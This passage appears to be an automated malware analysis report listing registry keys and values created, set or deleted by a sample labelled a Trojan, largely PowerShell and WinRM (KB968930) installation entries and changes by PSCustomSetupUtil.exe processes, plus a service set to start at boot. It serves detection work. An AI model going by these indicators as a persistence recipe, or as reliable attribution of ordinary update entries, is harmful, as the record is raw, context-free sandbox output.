"ParameterMessageFile" = "%systemroot%\system32\kernel32.dll"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\NumMethods]
"(Default)" = "6"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnService" = "RPCSS, HTTP, HTTPFilter"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"TypesSupported" = "7"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}]
"(Default)" = "IWSManEx"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"TSAware" = "1"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"(Default)" = "Microsoft Windows Remote Shell Host"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"UninstallCommand" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostModuleName" = "%System%\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.dll"

[HKCR\WSMan.Automation\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"

[HKCR\WSMan.Automation.1\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"

[HKLM\System\CurrentControlSet\Services\WinRM]
"Type" = "32"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\VersionIndependentProgID]
"(Default)" = "WSMan.Automation"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DisplayName" = "Windows Remote Management (WS-Management)"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"BitNames" = " rsError rsWarning rsTrace rsNone"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\0\win32]
"(Default)" = "%System%\WsmAuto.dll"

[HKCR\Microsoft.PowerShellConsole.1]
"EditFlags" = "131072"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledDate" = "5/11/2016"
"ReleaseType" = "Software Update"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCR\WSMan.InternalAutomation.1\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"

[HKCR\WSMan.Automation\CurVer]
"(Default)" = "WSMan.Automation.1"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\ProgID]
"(Default)" = "WSMan.InternalAutomation.1"

[HKCR\.ps1xml]
"(Default)" = "Microsoft.PowerShellXmlData.1"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\NumMethods]
"(Default)" = "4"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ImagePath" = "%WinDir%\System32\svchost.exe -k WinRM"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.PNF" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"MaxSize" = "15728640"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 A2 49 89 FE F7 71 A3 4E A7 1D 98 8B 57 A7 52"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "PSFactoryBuffer"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "PSFactoryBuffer"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Sources" = "PowerShell"

[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"MaxSize" = "20971520"

[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"ServiceDll" = "%SystemRoot%\system32\WsmSvc.dll"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\1033]
"Install" = "1"

[HKCR\Microsoft.PowerShellScript.1\DefaultIcon]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe,1"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\VersionIndependentProgID]
"(Default)" = "WSMan.InternalAutomation"

[HKCR\Microsoft.PowerShellData.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"

[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"seRVicemAIN" = "ServiceMain"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"TypesSupported" = "7"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledBy" = "%CurrentUserName%"

[HKCR\Microsoft.PowerShellData.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"AppID" = "{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerVersion" = "6.1.29.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008\iis]
"PathIISHelp" = "%WinDir%\Help\iishelp"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayIcon" = "%System%\WindowsPowerShell\v1.0\WTRInstaller.ico"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\.psc1]
"Content Type" = "application/PowerShell"

[HKCR\Microsoft.PowerShellXmlData.1]
"EditFlags" = "131072"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}]
"(Default)" = "WSMan InternalAutomation Class"

[HKCR\Microsoft.PowerShellData.1]
"EditFlags" = "131072"

[HKCR\Microsoft.PowerShellXmlData.1]
"FriendlyTypeName" = "Windows PowerShell XML Document"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ErrorControl" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008\iis]
"PathInetsrv" = "%System%\inetsrv"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"ARPLink" = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}]
"(Default)" = "IWSManResourceLocatorInternal"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008\iis]
"PathScripts" = "C:\Inetpub\iissamples\Scripts"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"AutoBackupLogFiles" = "0"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"

[HKCR\WSMan.InternalAutomation\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoRepair" = "1"

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}]
"(Default)" = "WinRM WMI Provider for User Profile"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"UninstallString" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\WSMan.Automation.1]
"(Default)" = "WSMan Automation Class"

[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"Install" = "1"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"RuntimeVersion" = "v2.0.50727"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}]
"(Default)" = "IWSManProvHost"

[HKCR\Microsoft.PowerShellModule.1]
"FriendlyTypeName" = "Windows PowerShell Script Module"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageVersion" = "1.0"

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"ThreadingModel" = "Both"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"ServerExecutable" = "%System%\winrshost.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayName" = "Windows Management Framework Core"
"InstallDate" = "20160511"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"Publisher" = "Microsoft Corporation"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"AllowProtectedRenames" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"ReleaseType" = "Software Update"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\NumMethods]
"(Default)" = "4"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsDelSignature"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}]
"(Default)" = "IWSMan"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PowerShellVersion" = "2.0"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\ProgID]
"(Default)" = "WSMan.Automation.1"

[HKCR\Microsoft.PowerShellScript.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnGroup" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008\iis]
"PathFTPRoot" = "C:\Inetpub\ftproot"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008\iis]
"PathWWWRoot" = "C:\Inetpub\wwwroot"
"PathIISSamples" = "C:\Inetpub\iissamples"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}]
"(Default)" = "WSMan Automation Class"

[HKCR\Microsoft.PowerShellScript.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "IHost"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Publisher" = "Microsoft Corporation"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"(Default)" = "%System%\wsmplpxy.dll"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ApplicationBase" = "%System%\WindowsPowerShell\v1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerName" = "Update.exe"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"AppID" = "{3feb2f63-0eec-4b96-84ab-da1307e0117c}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008\iis]
"PathIISAdmin" = "%System%\inetsrv\iisadmin"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"(Default)" = "Microsoft Windows Remote Shell Host"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageName" = "Windows Management Framework Core"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\Microsoft.PowerShellScript.1]
"FriendlyTypeName" = "Windows PowerShell Script"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\WinRM]
"Description" = "Allows access to management information from local and remote machines."

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}]
"(Default)" = "IWSManSession"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"HelpLink" = "http://go.microsoft.com/fwlink/?LinkID=163790"

[HKCR\WSMan.InternalAutomation.1]
"(Default)" = "WSMan Internal Class"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Type" = "Update"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\.psm1]
"(Default)" = "Microsoft.PowerShellModule.1"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\HELPDIR]
"(Default)" = "%System%"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsVerifyHash"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell]
"ConfigXML" = ""

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsCreateHash"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.inf" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"

[HKCR\WSMan.Automation]
"(Default)" = "WSMan Automation Class"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"file" = "%systemroot%\system32\config\EventForwarding-Operational.Evt"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsIsMyFileType"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"URLInfoAbout" = "http://go.microsoft.com/fwlink/?LinkID=163792"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"RegistryLocation" = " HKLM,SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\NumMethods]
"(Default)" = "4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"TypesSupported" = "7"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"Guid" = "24b9a175-8716-40e0-9b2b-785de75b1e67"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"SupportsCompatListeners" = "1"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "IShell"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"(Default)" = "%System%\winrmprov.dll"

[HKCR\.ps1]
"(Default)" = "Microsoft.PowerShellScript.1"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"Version" = "1.0"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ObjectName" = "NT AUTHORITY\NetworkService"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"(Default)" = "%System%\winrshost.exe"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008\iis]
"IISProgramGroup" = "Microsoft Internet Information Services"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"Active" = "1"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"(Default)" = "Microsoft Windows WSMan Provider Host"

[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"PID" = "89383-100-0001260-04309"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostAssemblyName" = "Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"

[HKCR\.psd1]
"(Default)" = "Microsoft.PowerShellData.1"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}]
"(Default)" = "IWSManEnumerator"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"ServicePackCachePath" = "c:\windows\ServicePackFiles\ServicePackCache"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"EventMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"Version" = "1.0"

The following service will be launched automatically at system boot up:

[HKLM\System\CurrentControlSet\Services\SENS]
"Start" = "2"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008\iis]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008]

The process PSCustomSetupUtil.exe:2428 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A9 17 DD 0F 46 C9 37 91 3D AA FE E4 AE 54 6A 67"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35,MSIL" = "18 68 49 9C CA AB D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "205"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "206"
"StoreChangeIDFor64BitProcesses" = "184"
"StoreChangeIDFor32BitProcesses" = "205"

The process PSCustomSetupUtil.exe:3452 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B EB 10 6E C7 87 49 6D CB 4E 94 77 C1 6A 3B 9C"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "B8 D9 AA 97 CA AB D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "194"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "195"
"StoreChangeIDFor64BitProcesses" = "173"
"StoreChangeIDFor32BitProcesses" = "194"

The process PSCustomSetupUtil.exe:3416 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C6 1A 45 C7 0A FD 17 F8 8F B8 C5 81 37 2D A0 2A"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Runtime, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "193"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35,MSIL" = "B0 2A 7B 97 CA AB D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "194"
"StoreChangeIDFor64BitProcesses" = "172"
"StoreChangeIDFor32BitProcesses" = "193"

The process PSCustomSetupUtil.exe:2800 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 E3 AA 93 0D B0 CD B0 CF D4 9B 8F 42 22 EE C4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "196"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "197"
